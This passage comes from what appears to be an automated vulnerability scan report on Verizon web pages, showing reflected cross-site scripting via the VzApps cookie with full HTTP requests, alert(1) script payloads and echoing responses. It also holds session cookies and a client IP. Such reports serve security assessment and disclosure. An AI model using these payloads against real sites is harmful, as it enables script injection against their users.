ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX136fa'><script>alert(1)</script>a9a22c4e567; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 94422
Expires: Sat, 20 Nov 2010 03:14:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX136fa'><script>alert(1)</script>a9a22c4e567; path=/
Set-Cookie: ContextInfo_Language=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Plans
</title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX136FA'><SCRIPT>ALERT(1)</SCRIPT>A9A22C4E567 ' />
...[SNIP]...

3.213. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 50211<script>alert(1)</script>b0f40fbc4a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX50211<script>alert(1)</script>b0f40fbc4a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92840
Expires: Sat, 20 Nov 2010 00:13:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX50211<script>alert(1)</script>b0f40fbc4a; path=/
Set-Cookie: ContextInfo_Language=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Plans
</title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX50211<SCRIPT>ALERT(1)</SCRIPT>B0F40FBC4A </DIV>
...[SNIP]...

3.214. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 134f1'><script>alert(1)</script>ef0109a6fac was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX134f1'><script>alert(1)</script>ef0109a6fac; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 94442
Expires: Sat, 20 Nov 2010 00:13:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:32 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX134f1'><script>alert(1)</script>ef0109a6fac; path=/
Set-Cookie: ContextInfo_Language=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Plans
</title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX134F1'><SCRIPT>ALERT(1)</SCRIPT>EF0109A6FAC ' />
...[SNIP]...

3.215. http://www22.verizon.com/Residential/HighSpeedInternet/Value/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Value/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d1ec'><script>alert(1)</script>5088e34c333 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX2d1ec'><script>alert(1)</script>5088e34c333; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74917
Expires: Sat, 20 Nov 2010 03:15:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:15:24 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX2d1ec'><script>alert(1)</script>5088e34c333; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX2D1EC'><SCRIPT>ALERT(1)</SCRIPT>5088E34C333 ' />
...[SNIP]...

3.216. http://www22.verizon.com/Residential/HighSpeedInternet/Value/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Value/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload dd0c6<script>alert(1)</script>63779292418 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXdd0c6<script>alert(1)</script>63779292418; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73317
Expires: Sat, 20 Nov 2010 03:15:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:15:30 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXdd0c6<script>alert(1)</script>63779292418; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXDD0C6<SCRIPT>ALERT(1)</SCRIPT>63779292418 </DIV>
...[SNIP]...

3.217. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Value/Value.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 81278<script>alert(1)</script>87264888db4 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/Value.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX81278<script>alert(1)</script>87264888db4; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74933
Expires: Sat, 20 Nov 2010 03:14:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:36 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX81278<script>alert(1)</script>87264888db4; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX81278<SCRIPT>ALERT(1)</SCRIPT>87264888DB4 </DIV>
...[SNIP]...

3.218. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Value/Value.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 16bd1'><script>alert(1)</script>1c358468da2 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/Value.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
